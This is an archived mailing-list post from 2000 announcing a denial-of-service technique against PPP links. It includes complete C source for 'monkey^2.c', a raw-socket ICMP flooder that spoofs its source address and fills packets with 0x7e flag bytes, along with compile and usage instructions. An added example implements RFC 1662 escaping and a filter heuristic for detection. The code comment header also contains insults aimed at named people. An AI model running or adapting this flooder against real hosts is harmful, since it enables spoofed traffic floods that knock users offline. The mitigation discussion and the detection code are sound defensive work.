Vulnerability Development mailing list archives
New DOS attack vs ppp links
From: bahz0r () YAHOO COM (cat catzor)
Date: Fri, 21 Jul 2000 03:51:35 -0700
------ USSR Research.

Concept: PPP uses a specific flag byte to signify the beginning and end of a PPP frame. If this byte is contained in the data portion of the frame it is escaped by two other bytes. Crafting a packet filled with the flag byte doubles the amount of data which goes through the PPP link, as well as consumes resources while the escaped bytes are unescaped.

Problem: "Problem" (and I do say "problem" because I see no way around this) lies within PPP itself, on link level. It is irrelevant which protocol is used to deliver data to the target machine.

Solution: Disallow ICMP traffic to your PPP connected machines (before the PPP link), or filter packets which contain a suspicious number of the PPP flag byte (0x7e).

Technical: A typical PPP frame looks like this:

  [FLAG (7e)][ADDR][CONTROL][PROTOCOL][INFORMATION][CRC][FLAG (7e)]

Note: most implementations don't actually transmit the addr and control fields (since these are static).

If the flag character is contained within the [INFORMATION] portion of the frame, it is replaced by the sequence [0x7d 0x5e]. So if an incoming packet contains one 7e byte, it will get converted to two other bytes when it enters the PPP link; hence, the flood will double.

The attached code uses an ICMP echo request to deliver the data to the target. If the target also replies to this packet (as it should) it will once again amplify the flood. In other words, for each byte the attacker sends, the target gets hit with two, and replies with two. The attached code supports spoofing of the originating IP address.

NOTE: by default PPP will also escape any byte with a value less than 0x20 (i.e. any ASCII control character), so while simply filtering suspicious amounts of 0x7e might save your PPP users from this particular piece of code, modifying the attack is as simple as changing the data character.

Code: Code developed by xaiou. Concept developed by xaiou, reviewed by USSR Research.
File Name: monkey^2.c
Platform: linux 2.x
Compile: gcc -o monkey^2 monkey.c
Suggested: ansi color capable terminal.

IMPORTANT: in order for this to do what it's supposed to do, it is imperative that the attacker NOT be on a PPP link himself. If one were to attack a PPP link FROM a PPP link, it would prove completely useless (because you'd be sending two bytes and the target would be getting hit by two; you might as well ping -f).

---------------------- begin monkey^2.c ----------------------------------
/****************************************************************************
 * Monkey Squared Dot Cee - only thing better than a monkey....
 * is monkey squared. - me myself and xaiou.
 * USSR Research Team - Concept and code by xaiou. Checksum function
 * stolen from smurf by TFreak.
 *
 * Concept: ppp uses a special byte, namely 0x7e, to designate start and
 * end of a packet. If this byte appears in data, it is escaped with
 * 0x7d and 0x5e. So in conclusion, sending a spoofed icmp echo request
 * to a target host on a ppp link, loaded with 0x7e, first of all, the load
 * doubles when it hits the ppp link, and if that wasn't enough, the victim
 * responds with this packet, again doubling the load. So for each 1 byte
 * you send the victim receives two and sends out two. Not bad, eh? Anyways
 * the only solution I see to this is to block icmp echo requests to your
 * ppp linked friends.
 *
 * Props: USSR Research, Neounix.com, superluck, optiklenz,
 * Richard Stevens (you're my hero), powerbox, armoredtech,
 * w00w00 team (j00 ar3 3rl33t), all the people in #c (i love you
 * guys!), aliensex, OGL, IanH. Also TFreak (i hope you don't mind
 * me borrowing your checksum function.) Also phrack and route
 * (you are my other hero), BlackIC for the coloreds. DJ Jeff from
 * the 418 club in mineapolis, and that one stripper...
 *
 * Morons: digiebola ("hacker" who can't code hello world) and his slut
 * "girlfriend" (the girl part is debatable). All irc hookers,
 * people who run NT, people who buy NT, people who make NT,
 * People who think they're LOU (you are not lou damn it)
 *
 * --------------------- USSR Research Team 2000 --------------------------
 ****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>

#define GREEN "\033[32m"
#define RED   "\033[31m"
#define GRAY  "\033[37m"

unsigned short in_chksum(u_short *addr, int len);   /* stolen from smurf */
void ussrinfo(void);
void usage(void);

int main(int ARGC, char *ARGV[])
{
    struct iphdr *iphdr;
    struct icmphdr *icmphdr;
    struct sockaddr_in sockaddress;
    char *packet;
    int raw_socket;
    int i;
    int no_packetsz;      /* number of packets to send, 0 = forever */
    int sizeofpacket;     /* icmp payload size in bytes */
    int totlen;           /* ip header + icmp header + payload */

    ussrinfo();
    if (ARGC != 5) {
        usage();
        exit(0);
    }

    sizeofpacket = atoi(ARGV[4]);
    if (sizeofpacket <= 0) {
        usage();
        exit(0);
    }
    totlen = sizeof(struct iphdr) + sizeof(struct icmphdr) + sizeofpacket;

    /* name the socket */
    memset(&sockaddress, 0, sizeof(sockaddress));
    sockaddress.sin_addr.s_addr = inet_addr(ARGV[2]);
    sockaddress.sin_family = AF_INET;   /* internet socket */
    sockaddress.sin_port = 0;           /* it's icmp...no port */

    /* raw socket, we supply the ip header ourselves; needs root */
    if ((raw_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        perror("getting socket");
        exit(-1);
    }

    packet = malloc(totlen);
    if (packet == NULL) {
        perror("malloc");
        exit(-1);
    }
    memset(packet, 0, totlen);   /* zero ip id/flags and icmp id/seq */
    iphdr = (struct iphdr *)packet;                          /* ip now refers to packet.iphdr */
    icmphdr = (struct icmphdr *)(packet + sizeof(struct iphdr));

    iphdr->tot_len = htons(totlen);
    iphdr->ihl = 5;              /* ip header length in 32 bit words */
    iphdr->version = 4;
    iphdr->ttl = 255;            /* maximum hops */
    iphdr->tos = 0;
    iphdr->frag_off = 0;         /* data offset */
    iphdr->protocol = IPPROTO_ICMP;
    iphdr->saddr = inet_addr(ARGV[1]);            /* fake source */
    iphdr->daddr = sockaddress.sin_addr.s_addr;   /* real destination */
    iphdr->check = in_chksum((u_short *)iphdr, sizeof(struct iphdr));   /* checksum */

    icmphdr->type = 8;   /* echo request */
    icmphdr->code = 0;   /* icmp subcode...screw it */
    /* the payload is nothing but ppp flag bytes; that is the whole point */
    memset(packet + sizeof(struct iphdr) + sizeof(struct icmphdr), 0x7e, sizeofpacket);
    /* icmp checksum covers header plus payload, so fill the payload first */
    icmphdr->checksum = in_chksum((u_short *)icmphdr, sizeof(struct icmphdr) + sizeofpacket);

    printf(RED "Now flooding %s\n", ARGV[2]);
    no_packetsz = atoi(ARGV[3]);
    i = 0;
    while (1) {
        printf(GRAY ".");
        fflush(stdout);
        if (sendto(raw_socket, packet, totlen, 0,
                   (struct sockaddr *)&sockaddress, sizeof(struct sockaddr)) < 0)
            perror("sendto");
        if ((i > no_packetsz) && (no_packetsz != 0)) {
            break;
        }
        i++;
    }
    printf(GREEN "\nMonkey Complete...monkey squared complete.\n" GRAY);
    close(raw_socket);
    free(packet);
    return 0;
}

/* standard internet checksum: one's complement of the one's complement sum */
unsigned short in_chksum(u_short *addr, int len)
{
    register int nleft = len;
    register int sum = 0;
    u_short answer = 0;

    while (nleft > 1) {
        sum += *addr++;
        nleft -= 2;
    }
    if (nleft == 1) {   /* odd trailing byte */
        *(u_char *)(&answer) = *(u_char *)addr;
        sum += answer;
    }
    sum = (sum >> 16) + (sum & 0xffff);   /* fold the carry bits */
    sum += (sum >> 16);
    answer = ~sum;
    return (answer);
}

void ussrinfo(void)
{
    printf("---------------------------------------------------------------\n");
    printf(GREEN "| Underground Security Systems Research Proudly Presents:     |\n\n");
    printf("| monkey squared dot cee - ppp linkz ...the end is near.      |\n");
    printf("| By: xaiou (tarik).                                          |\n");
}

void usage(void)
{
    printf(RED "| Usage: monkey^2 source destination count (0 for infinite) size |\n");
    printf(GRAY "|---------------------USSR Research --------------------------|\n");
}
------------------------------------ end monkey^2.c ------------------------
EOF

Attachment: monkey^2.c (application/x-unknown)
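Added example, not part of the original post or of monkey^2.c: the byte stuffing the post describes, as an async PPP link does it per RFC 1662 (0x7e and 0x7d go out as 0x7d followed by the byte XOR 0x20; bytes below 0x20 are escaped when their bit is set in the transmit ACCM, which defaults to all ones). On top of that it measures how much a payload expands on the link and flags a payload by its expansion ratio rather than by counting 0x7e alone, which also catches the control-character variant the NOTE above mentions. The function names, the 1.5 threshold and both sample payloads are this example's own assumptions.

```c
/*
 * ppp_stuff.c - added example, not from the original post or monkey^2.c.
 * RFC 1662 byte stuffing with a configurable ACCM, plus an expansion
 * measurement and a filter heuristic built on it. All names here are
 * this example's own.
 */
#include <stdint.h>
#include <stdio.h>
#include <stddef.h>
#include <string.h>

#define PPP_FLAG   0x7e   /* frame delimiter */
#define PPP_ESCAPE 0x7d   /* control escape */
#define PPP_XOR    0x20   /* escaped byte is XORed with this */

/* Default async-control-character map: every byte 0x00..0x1f is escaped. */
#define ACCM_DEFAULT 0xffffffffUL

/* Does byte c need escaping under the given transmit ACCM? */
static int ppp_needs_escape(uint8_t c, uint32_t accm)
{
    if (c == PPP_FLAG || c == PPP_ESCAPE)
        return 1;
    if (c < 0x20 && ((accm >> c) & 1))
        return 1;
    return 0;
}

/* Escape in[0..inlen) into out (capacity outcap). Returns bytes written,
 * or -1 if out is too small. Framing flags are not added here. */
static long ppp_escape(const uint8_t *in, size_t inlen, uint32_t accm,
                       uint8_t *out, size_t outcap)
{
    size_t o = 0;
    for (size_t i = 0; i < inlen; i++) {
        if (ppp_needs_escape(in[i], accm)) {
            if (o + 2 > outcap) return -1;
            out[o++] = PPP_ESCAPE;
            out[o++] = in[i] ^ PPP_XOR;
        } else {
            if (o + 1 > outcap) return -1;
            out[o++] = in[i];
        }
    }
    return (long)o;
}

/* Reverse the escaping (what the receiving pppd does). Returns bytes written,
 * or -1 on malformed input: a dangling 0x7d or a bare flag inside the data. */
static long ppp_unescape(const uint8_t *in, size_t inlen,
                         uint8_t *out, size_t outcap)
{
    size_t o = 0;
    for (size_t i = 0; i < inlen; i++) {
        uint8_t c = in[i];
        if (c == PPP_FLAG) return -1;
        if (c == PPP_ESCAPE) {
            if (++i >= inlen) return -1;
            c = in[i] ^ PPP_XOR;
        }
        if (o + 1 > outcap) return -1;
        out[o++] = c;
    }
    return (long)o;
}

/* Wire bytes per payload byte: 1.0 = no expansion, 2.0 = worst case. */
static double ppp_expansion(const uint8_t *p, size_t len, uint32_t accm)
{
    size_t wire = 0;
    for (size_t i = 0; i < len; i++)
        wire += ppp_needs_escape(p[i], accm) ? 2 : 1;
    return len ? (double)wire / (double)len : 1.0;
}

/* Filter heuristic: flag a payload whose expansion ratio exceeds
 * 'threshold' (1.5 is an assumed value). Every escape-worthy byte counts,
 * not just 0x7e, so swapping 0x7e for a control character does not evade it. */
static int ppp_suspicious(const uint8_t *p, size_t len, uint32_t accm,
                          double threshold)
{
    return ppp_expansion(p, len, accm) > threshold;
}

int main(void)
{
    /* Constructed inputs: a benign text payload and a monkey^2-style one. */
    const uint8_t benign[] = "GET /index.html HTTP/1.0\r\n\r\n";
    uint8_t flood[64], wire[256], back[256];
    memset(flood, PPP_FLAG, sizeof flood);

    long n = ppp_escape(flood, sizeof flood, ACCM_DEFAULT, wire, sizeof wire);
    long m = ppp_unescape(wire, (size_t)n, back, sizeof back);
    printf("flood: %zu payload bytes -> %ld wire bytes (ratio %.2f), round trip %s\n",
           sizeof flood, n, ppp_expansion(flood, sizeof flood, ACCM_DEFAULT),
           (m == (long)sizeof flood && memcmp(back, flood, (size_t)m) == 0) ? "ok" : "BAD");
    printf("benign ratio %.2f suspicious=%d; flood suspicious=%d\n",
           ppp_expansion(benign, sizeof benign - 1, ACCM_DEFAULT),
           ppp_suspicious(benign, sizeof benign - 1, ACCM_DEFAULT, 1.5),
           ppp_suspicious(flood, sizeof flood, ACCM_DEFAULT, 1.5));
    return 0;
}
```

The 64-byte flood payload comes out as 128 wire bytes (ratio 2.0), the HTTP line as 32 wire bytes for 28 (the four CR/LF bytes are escaped under the default ACCM), which is why a ratio threshold separates the two where a plain 0x7e count would not once the attacker switches data byte. Negotiating a smaller receive ACCM only shrinks the control-character case; the flag and escape bytes are always stuffed.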
Current thread:
- New DOS attack vs ppp links cat catzor (Jul 21)
- Re: New DOS attack vs ppp links Brad Spengler (Jul 23)
- Re: New DOS attack vs ppp links Eric Andry (Jul 27)
- Re: New DOS attack vs ppp links Brad Spengler (Jul 28)
- Re: New DOS attack vs ppp links Eric Andry (Jul 27)
- Re: New DOS attack vs ppp links Brad Spengler (Jul 23)